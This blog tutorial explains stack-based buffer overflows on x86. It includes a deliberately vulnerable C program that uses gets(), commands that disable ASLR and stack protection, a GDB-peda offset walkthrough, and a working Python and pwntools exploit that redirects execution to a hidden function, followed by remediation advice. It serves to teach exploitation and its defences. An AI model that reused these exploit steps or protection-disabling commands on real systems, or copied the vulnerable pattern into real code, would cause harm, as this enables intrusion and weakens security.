Buffer Overflows – The Art of Stack Smashing
Introduction
In this blog post, we will explore the fundamental concepts of buffer overflows. I examine a vulnerable function written in C to understand the mechanics of exploiting this vulnerability, which allows attackers to take control of the program’s flow and execute arbitrary code.
Stacks and Registers
The stack is a fundamental data structure in computer memory used for storing temporary data during the execution of a program. It operates on a “Last-In-First-Out” (LIFO) basis, where the last item pushed into the stack is the first one to be popped out. The stack is vital for managing function calls and local variables in programs.
In the x86 architecture, four registers are most relevant to stack management and control flow:
- ESP (Extended Stack Pointer): Points to the top of the stack, and it is used for pushing and popping values.
- EBP (Extended Base Pointer): Used to access function arguments and local variables.
- EIP (Extended Instruction Pointer): Contains the address of the next instruction to be executed.
- EFLAGS: Contains flags that represent the current state of the processor, including the condition codes resulting from arithmetic and logical operations.
In the x86_64 architecture, these registers are widened to 64 bits and renamed accordingly: RSP (stack pointer), RBP (base pointer), RIP (instruction pointer), and RFLAGS.
Understanding the Stack
On x86, the stack grows downwards, which means that as items are pushed onto the stack, they are stored at lower memory addresses. The stack pointer (ESP) points to the top of the stack.
As items are pushed onto the stack, the stack pointer decrements, moving towards lower memory addresses.
When items are popped off, the stack pointer increments, moving towards higher memory addresses, and the top of the stack moves upwards.
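The push and pop behaviour described above can be sketched with a small toy model. This is only an illustration, not how a CPU is implemented: the class name DescendingStack, the base address 0x1000, and the 64-byte region size are all made up for the example.

```python
import struct


class DescendingStack:
    """Toy model of a 32-bit stack that grows toward lower addresses."""

    def __init__(self, base=0x1000, size=64):
        self.base = base            # highest address of the region (exclusive)
        self.low = base - size      # lowest valid address
        self.mem = bytearray(size)  # backing storage for the region
        self.esp = base             # empty stack: ESP sits at the base

    def push(self, value):
        """Decrement ESP by 4, then store a 32-bit little-endian value there."""
        if self.esp - 4 < self.low:
            raise OverflowError("stack region exhausted")
        self.esp -= 4
        off = self.esp - self.low
        self.mem[off:off + 4] = struct.pack("<I", value)

    def pop(self):
        """Load the 32-bit value at ESP, then increment ESP by 4."""
        if self.esp >= self.base:
            raise IndexError("pop from empty stack")
        off = self.esp - self.low
        (value,) = struct.unpack("<I", self.mem[off:off + 4])
        self.esp += 4
        return value


stack = DescendingStack()
stack.push(0x11111111)
stack.push(0x22222222)
print(hex(stack.esp))    # 0xff8: two pushes moved ESP down by 8 bytes
print(hex(stack.pop()))  # 0x22222222: the last value pushed comes off first
```

Each push lowers ESP by the word size and each pop raises it again, which is the LIFO behaviour in terms of addresses.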
Buffer Overflow Vulnerability
A buffer overflow vulnerability occurs when a program writes more data into a buffer (an array of fixed size) than it can hold. The extra data overflows into adjacent memory locations, potentially overwriting other data, including function return addresses and other critical information. By manipulating the data written into the buffer, attackers can take control of the program’s flow and execute arbitrary code.
Let’s look at a vulnerable function written in C that demonstrates the vulnerability.
void vulnerable_function() {
    char buffer[16];
    printf("Enter your name: ");
    gets(buffer); // This function is vulnerable to buffer overflow
    printf("Hello, %s!\n", buffer);
}
The function gets() reads input from the user and stores it in the buffer without any bounds checking. If the input provided by the user is longer than the buffer size, it will overflow and overwrite adjacent memory.
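To make the effect of the missing bounds check concrete, here is a minimal simulation of a stack frame as a byte array. The layout (16-byte buffer, 4-byte saved EBP, 4-byte return address, 8 bytes of caller data) and the two addresses are hypothetical and simplified; a real compiler may add padding or saved registers between the buffer and the return address.

```python
import struct

BUF_SIZE = 16
ORIGINAL_EBP = 0xFFFFD648  # hypothetical saved base pointer
ORIGINAL_RET = 0x08049200  # hypothetical return address into main()


def new_frame():
    """Simplified frame: [buffer 16][saved EBP 4][return address 4][caller 8]."""
    return (bytearray(BUF_SIZE)
            + struct.pack("<II", ORIGINAL_EBP, ORIGINAL_RET)
            + bytearray(8))


def unbounded_copy(frame, data):
    """Mimics gets(): copies every input byte plus a NUL, ignoring BUF_SIZE."""
    data = data + b"\x00"
    if len(data) > len(frame):
        raise ValueError("input larger than the toy frame")
    frame[:len(data)] = data


def bounded_copy(frame, data):
    """Mimics fgets(buffer, BUF_SIZE, stdin): at most BUF_SIZE - 1 bytes plus NUL."""
    data = data[:BUF_SIZE - 1] + b"\x00"
    frame[:len(data)] = data


def return_address(frame):
    """Read the 32-bit return address stored after the buffer and saved EBP."""
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


overflowed = new_frame()
unbounded_copy(overflowed, b"A" * 20 + b"BBBB")
print(hex(return_address(overflowed)))  # 0x42424242: "BBBB" replaced the address

safe = new_frame()
bounded_copy(safe, b"A" * 20 + b"BBBB")
print(hex(return_address(safe)))        # 0x8049200: the return address is intact
```

The unbounded copy lets the input decide where the function returns, while the bounded copy truncates the input before it can reach the saved values.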
Creating a Vulnerable Program
Using the above vulnerable function, let’s create a vulnerable program in C that uses the gets() function to read user input and display it back.
#include <stdio.h>
#include <string.h>

void secret_function() {
    printf("Congratulations! You've successfully exploited the buffer overflow.\n");
}

void vulnerable_function() {
    char buffer[16];
    printf("Enter your name: ");
    gets(buffer); // This function is vulnerable to buffer overflow
    printf("Hello, %s!\n", buffer);
}

int main() {
    vulnerable_function();
    return 0;
}
Objective
We aim to exploit the buffer overflow vulnerability to execute secret_function() instead of returning to the main function as intended.
Disabling ASLR and Stack Canary
Address Space Layout Randomization (ASLR)
Address Space Layout Randomization (ASLR) is a security feature that randomizes the locations of program components in memory, making it harder for attackers to predict addresses and execute code.
Let’s see how enabling ASLR affects the address of stack pointer (ESP). To ensure ASLR is enabled, execute the following command:
echo 2 | sudo tee /proc/sys/kernel/randomize_va_space
To check the address ESP is pointing to, I saved and compiled the following code:
vi esp.c
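#include <stdio.h>
int main(void) {
    register unsigned int i asm("esp"); // bind i to the stack pointer register (GCC extension)
    printf("$esp = %#010x\n", i);       // print the current stack pointer value
    return 0;
}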
gcc -o esp esp.c
./esp
./esp
./esp
Running the binary several times shows that the location of the stack pointer is randomized on each run when ASLR is enabled.
If ASLR is disabled, the location of the stack pointer remains constant across runs.
Most modern operating systems enable ASLR by default. To simplify our exploit process, we disable ASLR temporarily.
To disable ASLR, execute the following command:
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
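The value written to randomize_va_space selects the randomization mode. As a rough sketch, the helper below reads the current setting on a Linux system and describes it. The function names describe_aslr and current_aslr are made up for this example, and the descriptions summarize the Linux kernel sysctl documentation.

```python
from pathlib import Path

# Meaning of /proc/sys/kernel/randomize_va_space, per the Linux sysctl docs.
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base and VDSO randomized",
    2: "stack, mmap base, VDSO and heap (brk) randomized",
}


def describe_aslr(raw):
    """Translate the raw file contents (e.g. "2\n") into a description."""
    value = int(raw.strip())
    return ASLR_MODES.get(value, f"unknown mode {value}")


def current_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Return a description of the current mode, or None if the file is absent."""
    p = Path(path)
    if not p.exists():
        return None  # not a Linux system, or /proc is not mounted
    return describe_aslr(p.read_text())


print(current_aslr())
```

Checking the setting this way before debugging helps confirm that addresses observed in one run will still be valid in the next.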
Stack Canary
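Stack protection, also known as a stack canary, is another security mechanism that places a random value (the canary) between the local buffers and the function’s return address. If the canary is overwritten during a buffer overflow, the program detects the corruption before the function returns and terminates. To exploit the vulnerability, we disable stack protection during compilation with -fno-stack-protector. The -m32 flag builds a 32-bit binary, and -z execstack marks the stack as executable, which this particular exploit does not strictly need because it returns into code that already exists in the binary.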
gcc -m32 -fno-stack-protector -z execstack vulnerable.c -o vulnerable
Since the protections have been disabled, the same can be confirmed using the checksec tool.
checksec ./vulnerable
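To illustrate what the canary check would do if it were left enabled, here is a toy simulation. The frame layout, the return address, and the fixed canary value are all hypothetical; a real canary is chosen randomly at process start and the check is emitted by the compiler.

```python
import struct

BUF_SIZE = 16
SAVED_RET = 0x08049200  # hypothetical return address


def make_frame(canary):
    """Simplified frame: [buffer 16][canary 4][return address 4]."""
    return bytearray(BUF_SIZE) + canary + struct.pack("<I", SAVED_RET)


def unchecked_write(frame, data):
    """Copy data into the buffer with no bounds check, like gets()."""
    if len(data) > len(frame):
        raise ValueError("input larger than the toy frame")
    frame[:len(data)] = data


def function_return(frame, canary):
    """Return the saved address, or abort if the canary was modified."""
    if bytes(frame[BUF_SIZE:BUF_SIZE + 4]) != canary:
        raise RuntimeError("stack smashing detected")
    return struct.unpack_from("<I", frame, BUF_SIZE + 4)[0]


canary = bytes.fromhex("00a1b2c3")  # fixed here only to keep the demo repeatable

frame = make_frame(canary)
unchecked_write(frame, b"Siddharth")
print(hex(function_return(frame, canary)))  # short input: normal return

frame = make_frame(canary)
unchecked_write(frame, b"A" * 20 + b"BBBB")
try:
    function_return(frame, canary)
except RuntimeError as err:
    print(err)  # the overflow had to cross the canary to reach the address
```

Because the canary sits between the buffer and the return address, a linear overflow cannot change the return address without also changing the canary, which is why the protection has to be disabled for this exercise.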
Naive Execution of Vulnerable Binary
When given input of the expected length, the program behaves normally.
./vulnerable
Enter your name: Siddharth
However, when the input is much longer than the buffer, the program crashes with a segmentation fault. A segmentation fault (segfault) occurs when a program attempts to access memory it is not permitted to access, or to execute code from an invalid or non-executable address.
./vulnerable
Enter your name: Siddharthhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
Analyzing the Binary using GDB
Exploits rarely work on the first attempt. Therefore, debugging tools like GDB are useful in understanding the behavior of the program in different test scenarios. In this case, we are interested in understanding where the crash occurs. The goal here is to overwrite the saved return address so that the Instruction Pointer (EIP) ends up pointing to the address of “secret_function”.
I am using Python Exploit Development Assistance (PEDA) for GDB to make the identification of offset easier.
# Install PEDA
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
# Debug the binary
$ gdb -q ./vulnerable
Creating a Pattern
A sequence of unique characters helps identify the exact position in the input that ends up in a given register or memory location. GDB-peda has a built-in feature to create such patterns, which lets us determine the number of bytes required to reach and overwrite the saved return address that is loaded into the instruction pointer (EIP or RIP).
# Create pattern of length 50
gdb-peda$ pattern_create 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
# Run the Binary
gdb-peda$ run
The pattern overflows the buffer. The saved base pointer and return address are overwritten, so EBP and EIP are loaded with pattern bytes when the function returns, and ESP is left pointing at pattern data.
If we can calculate the number of bytes required to reach the saved return address, we can place the address of “secret_function” there so that the function returns into it.
Finding the Offset
Once the program crashes with a segmentation fault, pieces of the pattern’s unique sequence appear in the registers and on the stack. By examining them, or by using a pattern matching tool such as pattern_offset in GDB-peda, the exact offset (number of bytes) from the start of the buffer to the point where a given piece of the pattern begins can be identified. This offset tells us how many bytes of input are needed to reach the saved return address.
# Read the word at the top of the stack (where $ESP points)
gdb-peda$ x/wx $esp
0xffffd630: 0x41412941
# Calculate offset
gdb-peda$ pattern_offset 0x41412941
1094789441 found at offset: 32
The word at the top of the stack is “0x41412941”, and pattern_offset locates it at offset 32 in the pattern. After the faulting return, ESP points just past the saved return address, so the return address itself occupies offsets 28 to 31. The payload is therefore 32 bytes in total: 28 bytes of junk to reach the return address, followed by the 4-byte address of “secret_function”.
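The offset lookup can be reproduced by hand as a sanity check. The sketch below searches the 50-byte pattern from the session above for the little-endian bytes of the value read at ESP. The function name offset_in_pattern is made up for this example, and the subtraction of 4 assumes a 32-bit binary in which ESP points just past the return address after the faulting return.

```python
import struct

# The 50-byte pattern generated by pattern_create in the GDB session.
PATTERN = b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA"


def offset_in_pattern(value, pattern=PATTERN):
    """Find where a 32-bit value read from memory occurs in the pattern.

    x86 is little-endian, so 0x41412941 is stored as the bytes 41 29 41 41.
    Returns -1 if the value does not occur in the pattern.
    """
    needle = struct.pack("<I", value)
    return pattern.find(needle)


esp_offset = offset_in_pattern(0x41412941)
ret_offset = esp_offset - 4  # the 4-byte return address sits just below ESP

print(esp_offset)  # 32
print(ret_offset)  # 28
```

This matches the pattern_offset result and gives the 28 bytes of junk needed before the return address.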
Finding the Secret_Function Address
The function address can be found easily through GDB.
# Fetch address of secret_function
gdb-peda$ print secret_function
$1 = {<text variable, no debug info>} 0x565561b9 <secret_function>
gdb-peda$ info address secret_function
Symbol "secret_function" is at 0x565561b9 in a file compiled without debugging.
gdb-peda$
The secret_function is located at address “0x565561b9”.
Calculating the Payload
With the offset value known, you can now calculate the payload needed to exploit the vulnerability. The payload typically consists of a combination of junk data (e.g., 'A' * offset) to fill the buffer until it reaches the return address (EIP or RIP), followed by the desired target address (e.g., the address of the secret function) to overwrite the return address with.
Therefore, the payload would be:
junk (28 bytes) + secret_function_address (4 bytes)
By overwriting the return address with the target address, you can control the flow of the program and redirect it to execute your chosen code, effectively achieving arbitrary code execution.
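As a minimal sketch of that calculation, the payload can be assembled with Python's struct module. The address and offset are the ones found in the GDB session above and will differ on other builds; the function name build_payload is made up for this example.

```python
import struct

SECRET_FUNCTION_ADDRESS = 0x565561B9  # from "print secret_function" in GDB
RET_OFFSET = 28                       # junk bytes before the return address


def build_payload(address, offset=RET_OFFSET, filler=b"A"):
    """Junk up to the return address, then the address as 4 little-endian bytes."""
    return filler * offset + struct.pack("<I", address)


payload = build_payload(SECRET_FUNCTION_ADDRESS)
print(len(payload))        # 32
print(payload[-4:].hex())  # b9615556: the address bytes in little-endian order
```

The address bytes appear reversed because x86 stores multi-byte values with the least significant byte first.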
Crafting the Exploit
The payload can be generated with Python and piped into the binary.
python3 -c 'import sys;sys.stdout.buffer.write(b"\x41" * 28 + b"\xb9\x61\x55\x56")'|./vulnerable
Note that the print() function in Python 3 behaves differently from the one in Python 2: it writes text rather than raw bytes, so bytes above 0x7f can be altered by the output encoding. I used sys.stdout.buffer.write() to write the raw bytes and avoid this problem.
Another way would be to use PwnTools to send the payload and receive the response.
from pwn import *
# Replace with the actual address of secret_function
secret_function_address = 0x565561b9
# Number of junk bytes needed to reach the saved return address
offset = 28
junk = b"A" * offset
# Overwrite the return address
payload = junk + p32(secret_function_address) # p32() packs the address as 4 little-endian bytes
# Start the vulnerable program
p = process('./vulnerable')
# Send the payload
p.sendline(payload)
# Receive and print the output
print(p.recvall().decode(errors='replace'))
We’ve successfully executed the “secret_function” by overwriting the Instruction Pointer with the address of “secret_function”.
Tricky Questions
Does an upward growing stack prevent Buffer Overflows?
No. Buffer overflows would still be possible even if the stack did not grow downward. The direction of stack growth does not fundamentally determine the existence or possibility of buffer overflow vulnerabilities. Buffer overflows occur when data is written beyond the intended boundaries of a buffer, leading to overwriting adjacent memory locations. The direction of stack growth only affects how the stack addresses are managed and how local variables and function call frames are organized in memory.
Are Buffer Overflow and Stack Overflow the same?
No, buffer overflow and stack overflow are not the same, but they are related concepts.
- Buffer Overflow refers to the condition when data is written outside the bounds of a buffer, overwriting adjacent memory locations. This can happen in both stack and heap memory regions.
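- Stack Overflow occurs when a program’s call stack consumes more memory than the system has allocated for it, typically through very deep or unbounded recursion. It should not be confused with a stack-based buffer overflow, which is a buffer overflow that happens to occur in stack memory.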
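Call stack exhaustion is easy to provoke with unbounded recursion. The sketch below uses Python only as an analogy: the interpreter enforces its own recursion limit and raises RecursionError rather than letting the native stack overflow, whereas a C program in the same situation would typically crash with a segmentation fault. The function names are made up for this example.

```python
def recurse(depth=0):
    """Call itself forever; every call adds another frame to the call stack."""
    return recurse(depth + 1)


def exhausts_call_stack():
    """Return True if unbounded recursion is stopped by the recursion limit."""
    try:
        recurse()
    except RecursionError:
        return True
    return False


print(exhausts_call_stack())  # True
```

No buffer is written out of bounds here; the stack simply runs out of room for new frames, which is what distinguishes this from the overflow exploited in this post.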
Remediation
- Avoid C functions that perform no bounds checking, such as gets(), strcpy(), strcat(), and scanf() with an unbounded %s. Instead, use bounded alternatives such as fgets() and snprintf(), and use strncpy() with care, since it does not null-terminate the destination when the source fills it.
- Use modern mitigations such as Address Space Layout Randomization (ASLR), non-executable memory (DEP/NX), stack canaries (stack protector), bounds checking, safe string functions, and software sandboxing. It is essential to implement a combination of these mitigations to create a strong defense against buffer overflow exploits.